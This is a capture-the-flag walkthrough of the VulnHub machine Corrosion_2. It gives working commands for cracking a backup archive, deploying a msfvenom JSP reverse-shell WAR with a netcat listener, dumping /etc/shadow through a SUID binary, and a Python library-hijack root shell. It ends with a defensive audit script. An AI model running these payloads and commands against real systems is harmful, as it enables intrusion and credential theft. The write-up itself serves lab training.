Corrosion_2 (VulnHub – Easy)

Corrosion_2 is a Tomcat‑based machine where enumeration quickly reveals a backup archive containing Tomcat credentials. A WAR reverse shell provides initial access, followed by pivoting into a local user and escalating privileges through two separate misconfigurations: a SUID binary capable of reading /etc/shadow, and a Python library hijacking opportunity.

Overview

Target: 10.10.10.12
Initial vector: exposed backup.zip → Tomcat Manager → WAR reverse shell
Lateral movement: user password reuse
Privilege escalation: SUID binary → shadow dump → Python library hijack

Enumeration

Nikto Scan

$ nikto -url http://10.10.10.12:8080

Findings:

Cracking the ZIP Password

$ zip2john backup.zip > hash.txt
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
-> @administrator_hi5

Extract the archive:

$ 7z x backup.zip

Inside the backup:

backup/tomcat-users.xml

Credentials recovered:

admin | manager : melehifokivai

Login to Tomcat Manager:

http://10.10.10.12:8080/manager/html

Foothold – Deploying a WAR Reverse Shell

Create a WAR payload:

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.9 LPORT=443 \
  -f war -o revshell.war

Listener:

$ nc -nlvp 443

Upload and deploy the WAR file via Tomcat Manager, then visit:

http://10.10.10.12:8080/revshell/

A shell is obtained.

Lateral Movement – User jaye

Inspect /etc/passwd and attempt known credentials:

$ su jaye
Password: melehifokivai

User jaye shell obtained.

Privilege Escalation

1. SUID Binary → Read /etc/shadow

Enumerate SUID binaries:

$ find / -perm -4000 2>/dev/null

A suspicious binary appears in /home/jaye/Files/look. Checking GTFOBins reveals it can read arbitrary files.

Dump /etc/shadow:

$ look '' /etc/shadow

Extract randy’s hash and crack it:

$ john randy_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Switch user:

$ su randy

2. Python Library Hijacking (root)

Check sudo permissions:

$ sudo -l
-> (root) NOPASSWD: /home/randy/randombase64.py

The script does a plain `import base64`, which Python resolves by searching sys.path in order, and the first entry on that path is the directory containing the script itself. Hijack the import by creating a malicious base64.py in a directory that is searched before the standard library.

Locate the real library:

$ find / -name "base64.py" 2>/dev/null
-> /usr/lib/python3.8/base64.py

Modify it (or create a malicious version in the working directory, which is searched first):

import os
os.system("/bin/bash -i")

Execute with sudo:

$ sudo python3 /home/randy/randombase64.py

A root shell is spawned.
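The root cause of this last step is a sudo rule pointing at a script whose directory the sudoer owns, combined with Python searching that directory before the standard library. The following audit is an added example written for this write-up, not code from the machine or its author: given the sudo-allowed script and the unprivileged user, it reports module-search directories that user can write to. The helper names and the constructed temporary-directory layout are assumptions. The corresponding fix is to keep the script in a root-owned directory, or invoke it with `python3 -I`, which drops the script directory from sys.path.

```python
import os
import stat
import tempfile
from dataclasses import dataclass


@dataclass(frozen=True)
class Principal:
    """The unprivileged user allowed to run the script through sudo."""
    uid: int
    gids: frozenset


def is_writable_by(st_mode: int, st_uid: int, st_gid: int, who: Principal) -> bool:
    """Owner/group/other check on stat bits (ACLs and the sticky bit are ignored).
    Root is deliberately not special-cased: the question is whether the
    *unprivileged* sudoer can drop a file into this directory."""
    if st_uid == who.uid:
        return bool(st_mode & stat.S_IWUSR)
    if st_gid in who.gids:
        return bool(st_mode & stat.S_IWGRP)
    return bool(st_mode & stat.S_IWOTH)


def hijackable_path_entries(script_path: str, who: Principal, path_entries=None) -> list:
    """Return module-search directories `who` can write to, in lookup order.
    `python3 /path/to/script.py` puts /path/to first on sys.path, so a planted
    base64.py there shadows the standard-library copy. `path_entries` defaults
    to just that directory; pass the interpreter's sys.path to audit the rest."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    entries = [script_dir] + [p for p in (path_entries or []) if p]
    hits = []
    for entry in entries:
        try:
            st = os.stat(entry)
        except FileNotFoundError:
            continue
        if stat.S_ISDIR(st.st_mode) and is_writable_by(st.st_mode, st.st_uid, st.st_gid, who):
            hits.append(entry)
    return hits


def demo_corrosion_layout(as_owner: bool) -> bool:
    """Constructed stand-in for /home/randy/randombase64.py: a script inside a
    0755 directory owned by the current user. Returns True if the audited
    principal (the directory owner, or some other uid) could hijack it."""
    with tempfile.TemporaryDirectory() as home:
        os.chmod(home, 0o755)
        script = os.path.join(home, "randombase64.py")
        open(script, "w").close()
        who = Principal(os.getuid() + (0 if as_owner else 1), frozenset())
        return hijackable_path_entries(script, who) == [home]


if __name__ == "__main__":
    print("owner can hijack:", demo_corrosion_layout(True))      # True
    print("other user can hijack:", demo_corrosion_layout(False))  # False
```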

Conclusion

Corrosion_2 combines several classic misconfigurations: exposed Tomcat backups, password reuse, SUID file abuse, and Python library hijacking. The machine demonstrates how a single leaked archive can cascade into full system compromise.